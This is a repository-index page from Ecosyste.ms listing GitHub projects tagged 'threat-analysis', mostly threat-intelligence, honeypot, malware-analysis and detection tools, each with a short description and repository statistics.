Ecosyste.ms: Repos
An open API service providing repository metadata for many open source software ecosystems.
GitHub topics: threat-analysis
deepfence/ThreatMapper
Open source cloud native security observability platform. Linux, K8s, AWS Fargate and more.
Language: TypeScript - Size: 215 MB - Last synced: 23 days ago - Pushed: 23 days ago - Stars: 4,630 - Forks: 566
InQuest/ThreatIngestor
Extract and aggregate threat intelligence.
Language: Python - Size: 1.65 MB - Last synced: 1 day ago - Pushed: 3 months ago - Stars: 790 - Forks: 133
ecstatic-nobel/OSweep
Don't Just Search OSINT. Sweep It.
Language: Python - Size: 43.5 MB - Last synced: 1 day ago - Pushed: over 3 years ago - Stars: 303 - Forks: 70
tatsuiman/malware-traffic-analysis.net
Download pcap files from http://www.malware-traffic-analysis.net/
Size: 912 MB - Last synced: 1 day ago - Pushed: over 6 years ago - Stars: 69 - Forks: 21
t4d/PhishingKitHunter
Find phishing kits which use your brand/organization's files and image.
Language: Python - Size: 29.3 KB - Last synced: 17 days ago - Pushed: over 5 years ago - Stars: 221 - Forks: 64
cowrie/cowrie
Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io
Language: Python - Size: 9.49 MB - Last synced: 27 days ago - Pushed: 29 days ago - Stars: 4,903 - Forks: 846
mishalhossin/DetectXDiscord
This Discord bot is designed to provide file scanning functionality using the VirusTotal API to check for viruses and other malware in attachments uploaded to a Discord channel.
Language: Python - Size: 36.1 KB - Last synced: 17 days ago - Pushed: 12 months ago - Stars: 5 - Forks: 1
CYB3RMX/Qu1cksc0pe
All-in-One malware analysis tool.
Language: YARA - Size: 107 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1,096 - Forks: 163
MISP/MISP
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
Language: PHP - Size: 136 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 4,963 - Forks: 1,335
zdhenard42/SOC-Multitool
A powerful and user-friendly browser extension that streamlines investigations for security professionals.
Language: JavaScript - Size: 35.2 KB - Last synced: about 1 month ago - Pushed: 9 months ago - Stars: 308 - Forks: 41
Graylog2/graylog-plugin-threatintel
Graylog Processing Pipeline functions to enrich log messages with IoC information from threat intelligence databases
Language: Java - Size: 1.68 MB - Last synced: 30 days ago - Pushed: 2 months ago - Stars: 145 - Forks: 21
MISP/misp-decaying-models
MISP decaying models
Language: Shell - Size: 7.81 KB - Last synced: about 2 months ago - Pushed: almost 4 years ago - Stars: 9 - Forks: 4
barleybobs/DisTrace
Distrace is a collection of python scripts that are designed to assist in tracking, analysing, and disrupting malware campaigns that utilise Discord for command & control (C2).
Language: Python - Size: 17.6 KB - Last synced: about 2 months ago - Pushed: about 2 months ago - Stars: 2 - Forks: 0
ethansilvas/google-cybersecurity
Projects, notes, and write-ups I have done while completing the Google Cybersecurity Certificate
Language: Jupyter Notebook - Size: 5.13 MB - Last synced: about 2 months ago - Pushed: 7 months ago - Stars: 29 - Forks: 14
AppThreat/threat-db
A graph database for components, vulnerabilities and threats powered by dgraph
Language: Python - Size: 1.26 MB - Last synced: 17 days ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1
CERTCC/Vulnerability-Data-Archive
With the hope that someone finds the data useful, we periodically publish an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database. See also https://github.com/CERTCC/Vulnerability-Data-Archive-Tools
Size: 70.2 MB - Last synced: 2 months ago - Pushed: almost 4 years ago - Stars: 82 - Forks: 25
reportsmishing/public_code
Bunch of scripts helping to investigate smishing URLs
Language: Python - Size: 9.77 KB - Last synced: 14 days ago - Pushed: 11 months ago - Stars: 1 - Forks: 0
reportsmishing/knowledgebase
Size: 1.41 MB - Last synced: 14 days ago - Pushed: 8 months ago - Stars: 3 - Forks: 0
ethansilvas/security-plus
Notes and practice exam analysis I completed when preparing for my CompTIA Security+ exam
Size: 272 MB - Last synced: about 2 months ago - Pushed: 6 months ago - Stars: 3 - Forks: 0
satan1a/TheRoadOfSO
学习安全运营的记录 | The knowledge base of security operation
Language: HTML - Size: 21.8 MB - Last synced: 2 months ago - Pushed: 9 months ago - Stars: 588 - Forks: 133
CloudDefenseAI/falco_extended_rules
Curating Falco rules with MITRE ATT&CK Matrix
Language: Python - Size: 102 KB - Last synced: 3 months ago - Pushed: 3 months ago - Stars: 62 - Forks: 9
ion-storm/sysmon-config Fork of SwiftOnSecurity/sysmon-config
Advanced Sysmon ATT&CK configuration focusing on Detecting the Most Techniques per Data source in MITRE ATT&CK, Provide Visibility into Forensic Artifact Events for UEBA, Detect Exploitation events with wide CVE Coverage, and Risk Scoring of CVE, UEBA, Forensic, and MITRE ATT&CK Events.
Language: PowerShell - Size: 1.56 MB - Last synced: 3 months ago - Pushed: 6 months ago - Stars: 741 - Forks: 142
TalEliyahu/Threat_Model_Examples
Collection of Threat Models
Size: 70.3 KB - Last synced: 4 months ago - Pushed: almost 2 years ago - Stars: 333 - Forks: 49
curated-intel/Threat-Actor-Profile-Guide
The Threat Actor Profile Guide for CTI Analysts
Size: 645 KB - Last synced: 4 months ago - Pushed: 10 months ago - Stars: 79 - Forks: 11
alvin-tosh/Infosec-and-Hacking-Scripts
🚀 This is a collection of hacking🔥 and pentesting 🧐 scripts to help with enumeration, OSINT, exploitation and post exploitation automated scripts to make hacking easier🌠. Have fun!😎
Language: Python - Size: 9.76 MB - Last synced: 4 months ago - Pushed: 4 months ago - Stars: 117 - Forks: 38
bobby-tablez/IP-Obfuscator
Hide an IP address in scripts using hex/decimal/octal conversions
Language: PowerShell - Size: 185 KB - Last synced: 5 months ago - Pushed: 5 months ago - Stars: 51 - Forks: 9
markmackensen/attack_layer_builder
A Python script to generate MITRE ATT&CK Navigator layers from TTPs
Language: Python - Size: 593 KB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1 - Forks: 0
R4GN4R0K-SEC/R4GN4R0K-SEC.github.io
**|⚡️💥🏴☠️#RAGNAR0K-SEC# 🏴☠️💥⚡️|** **|⚡️🌐 #Offensive CyberSec# 🌐⚡️|** ***|⚡️⚔️#CyberHacktivism#⚔️ ⚡️|*** *****|⚡️🏴☠️#PenTesting#🏴☠️ ⚡️|***** *******|⚡️ 🔎#OSINT#🔍 ⚡️|******* **********|⚡️ #lulz# ⚡️|**********
Size: 12.7 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 0 - Forks: 0
markmackensen/ATTACK-Layer-Builder
A Python script to generate MITRE ATT&CK Navigator layers from TTPs
Language: Python - Size: 493 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 1 - Forks: 0
ecstatic-nobel/Analyst-Arsenal 📦
A toolkit for Security Researchers
Language: Python - Size: 5.86 MB - Last synced: 6 months ago - Pushed: over 4 years ago - Stars: 120 - Forks: 36
Daethyra/OpenDTS 📦
Open Domestic Threat Scanner - LLM Threat-Intelligence
Language: Python - Size: 60 MB - Last synced: 17 days ago - Pushed: 9 months ago - Stars: 2 - Forks: 0
401trg/detections
This repository contains all public indicators identified by 401trg during the course of our investigations. It also includes relevant yara rules and ids signatures to detect these indicators.
Language: Python - Size: 4.37 MB - Last synced: 6 months ago - Pushed: about 3 years ago - Stars: 120 - Forks: 19
izm1chael/threatnote Fork of brianwarehime/threatnote
threatnote | Cyber Threat Intelligence Notebook
Language: JavaScript - Size: 13.3 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0
vrikodar/DiaLog
DiaLog is a powerful Log File Analyzer that can also do passive analysis of malicious IP's Found in web-server Traffic
Language: Python - Size: 4.44 MB - Last synced: 7 months ago - Pushed: over 2 years ago - Stars: 5 - Forks: 0
danieleperera/SocAnalystArsenal 📦
Quick SOC L1 ticket structure
Language: Python - Size: 4.52 MB - Last synced: 7 months ago - Pushed: almost 5 years ago - Stars: 30 - Forks: 13
ancailliau/SynSharp
A C# client for Vertex Synapse
Language: C# - Size: 282 KB - Last synced: 17 days ago - Pushed: 6 months ago - Stars: 2 - Forks: 1
jamesbower/EngagedThreat
The goal of Engaged Threat is to provide honeypot researchers the ability to hold the attention of an attacker or to induce the attacker to participate in some sort of increased activity.
Language: Shell - Size: 11.7 KB - Last synced: 4 months ago - Pushed: about 5 years ago - Stars: 7 - Forks: 1
MojtabaTajik/SecureBox
Safe virtual drive which prevent threats being executed
Language: C# - Size: 206 KB - Last synced: 9 months ago - Pushed: 9 months ago - Stars: 3 - Forks: 2
jackaduma/ThreatReportExtractor
Extracting Attack Behavior from Threat Reports
Language: Python - Size: 21.6 MB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 53 - Forks: 13
jackaduma/SecBERT
pretrained BERT model for cyber security text, learned CyberSecurity Knowledge
Language: Python - Size: 490 KB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 81 - Forks: 17
cyph3rryx/CyberThreat-Monitor
CyberThreat Monitor (SIEM Lab) with Microsoft Azure is a comprehensive threat monitoring solution built on Azure Sentinel, providing real-time visibility into global cyber threats.
Language: PowerShell - Size: 1.41 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 1 - Forks: 0
0xElshazly/0xElshazly.github.io
Threat Analyst - Incident Response - Digital Forensics - Malware Analysis - Blue Team ~ Blog
Language: JavaScript - Size: 53.3 MB - Last synced: 8 months ago - Pushed: 8 months ago - Stars: 1 - Forks: 0
techathena/veritas
pcap analyser that uses rest api for IP/URL reputation and also for obtaining URL's
Language: Python - Size: 8.44 MB - Last synced: about 2 months ago - Pushed: over 3 years ago - Stars: 2 - Forks: 0
secnnet/AMSI-Scripts
Language: PowerShell - Size: 9.77 KB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0
sebdufourcq/SOC-Multitool-for-Firefox
A powerful and user-friendly browser extension that streamlines investigations for security professionals.
Language: JavaScript - Size: 12.7 KB - Last synced: 10 months ago - Pushed: 10 months ago - Stars: 0 - Forks: 0
blockboard/ThreatMapper Fork of deepfence/ThreatMapper
Identify vulnerabilities in running containers, images, hosts and repositories
Size: 9.84 MB - Last synced: 10 months ago - Pushed: almost 4 years ago - Stars: 2 - Forks: 2
dc401/py-vthashcheck
A proof of concept AWS Lambda Python 3.7 runtime that takes Amazon S3 objects, evaluates against file magic MIME types, and will check existing SHA256 hashes or upload the file to VirusTotal using an API key. The API key is retrieved using security best practices with AWS Secrets Manager cached to reduce API overhead.
Language: Python - Size: 13.1 MB - Last synced: 23 days ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0
scriptingislife/insight
Insight aids in profiling a host by searching several online services for information about an IP or domain name.
Language: Python - Size: 318 KB - Last synced: 11 months ago - Pushed: over 2 years ago - Stars: 3 - Forks: 0
scriptingislife/Mapper-Server
Map and visualize SSH logins from sensors.
Language: Python - Size: 86.9 KB - Last synced: 11 months ago - Pushed: almost 6 years ago - Stars: 3 - Forks: 2
JacYuan1/Malware-Analysis-Project
Analyze different types of malware with the use of static and dynamic analysis techniques.
Size: 2.87 MB - Last synced: about 1 year ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0
wisepythagoras/honeyshell
An SSH honeypot written entirely in Go.
Language: Go - Size: 154 KB - Last synced: about 2 months ago - Pushed: 3 months ago - Stars: 7 - Forks: 1
Truvis/Suricata_Threat-Hunting-Rules
Collection of Suricata rule sets that I use modified to my environments.
Size: 23.4 KB - Last synced: 12 months ago - Pushed: over 3 years ago - Stars: 27 - Forks: 9
jh00nbr/Phishruffus
Intelligent threat hunter and phishing servers
Language: Python - Size: 8.79 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 43 - Forks: 25
Avengers7/ThreatExchange
一个威胁交换平台
Language: Python - Size: 4.88 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 4 - Forks: 0
security-union/going-fishing-with-my-raspberry-pi
Size: 1.04 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 21 - Forks: 5
ecstatic-nobel/IOC-Report 📦
Generate a report containing IOCs gathered from VirusTotal and Hybrid-Analysis.
Language: Python - Size: 114 KB - Last synced: about 1 year ago - Pushed: about 5 years ago - Stars: 3 - Forks: 4
paulveillard/cybersecurity-threat-detection
An ongoing & curated collection of awesome software best practices and remediation techniques, libraries and frameworks, E-books and videos, Technical guidelines and important resources about Threat Detection & Hunting.
Size: 138 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 22 - Forks: 4
trickest/packages
Automated compromise detection of the world's most popular packages
Size: 5.27 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 10 - Forks: 2
katahiromz/AmsiScanner
Threat detector for Windows 10
Language: C++ - Size: 58.6 KB - Last synced: 13 days ago - Pushed: about 5 years ago - Stars: 3 - Forks: 1
AzAgarampur/PsForge
Process Hollowing demonstration & explanation
Language: C++ - Size: 382 KB - Last synced: about 1 year ago - Pushed: about 3 years ago - Stars: 25 - Forks: 7
CYB3RMX/C2Data
A database for captured data (malicious files etc.) from command and control servers.
Size: 3.91 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 3 - Forks: 0
tsumarios/AMAYARA-Lab
The アマヤラ Lab project provides a ready-to-use Jupyter Lab environment to help out with Android malware analysis using YARA rules.
Language: Jupyter Notebook - Size: 46.9 KB - Last synced: 10 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0
xakepnz/STRIKEWRITER
Looks up details on a public IPV4 address against ip-info and blacklist-search sites. Providing a reputation check.
Language: Python - Size: 53.7 KB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 3
aishee/Yukio
Script auto generate rules with IOC
Language: Python - Size: 6.84 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 2 - Forks: 0
ranguli/ip
ip: (the) i(nternet is) p(robably down)
Language: Python - Size: 4.67 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1
alan-analytics/kingstonThreatStudy
Repository for the Kingston University threat study
Language: R - Size: 8.31 MB - Last synced: 8 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0
ytisf/Maltego-OTX-Pulses
A set of transformations to for indicators-pulses
Language: Python - Size: 22.5 KB - Last synced: 13 days ago - Pushed: over 4 years ago - Stars: 1 - Forks: 1
west-wind/abuse-insights
To extract the usernames attempted by a compromised host. This information is obtained from Abuse IP DB, reports' comments.
Language: Python - Size: 13.7 KB - Last synced: 7 months ago - Pushed: about 2 years ago - Stars: 1 - Forks: 0
Heimdall-Framework/heimdall-framework
USB threat evaluation framework for Linux
Language: Python - Size: 5.36 MB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 0
plushed/threatcalc
Calculate threat levels based on Capability, Opportunity, Intent ratings
Language: Python - Size: 18.8 MB - Last synced: about 1 year ago - Pushed: almost 4 years ago - Stars: 0 - Forks: 0
Heimdall-Framework/heimdall-paper
Size: 1.81 MB - Last synced: about 1 year ago - Pushed: about 4 years ago - Stars: 0 - Forks: 0
Piuliss/manati-docker
This repository contains the Dockerfile of the project ManaTI https://github.com/stratosphereips/Manati
Language: Shell - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: about 6 years ago - Stars: 3 - Forks: 1
ecstatic-nobel/Google-Indicator-Search
Programmatically find relationships between a list of strings using Google.
Language: Python - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: over 4 years ago - Stars: 2 - Forks: 1
MonoidalAttackTrees/Lina
A Haskell EDSL for conducting threat analysis using Attack Trees
Language: Haskell - Size: 75.2 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 3 - Forks: 1
jamieres/mz-data-extract
Simple tool that you can use for collect relevant data of Portable Executable (PE) files that can be used for Intel during a line of research related with malware.
Language: Python - Size: 657 KB - Last synced: about 1 year ago - Pushed: almost 7 years ago - Stars: 1 - Forks: 2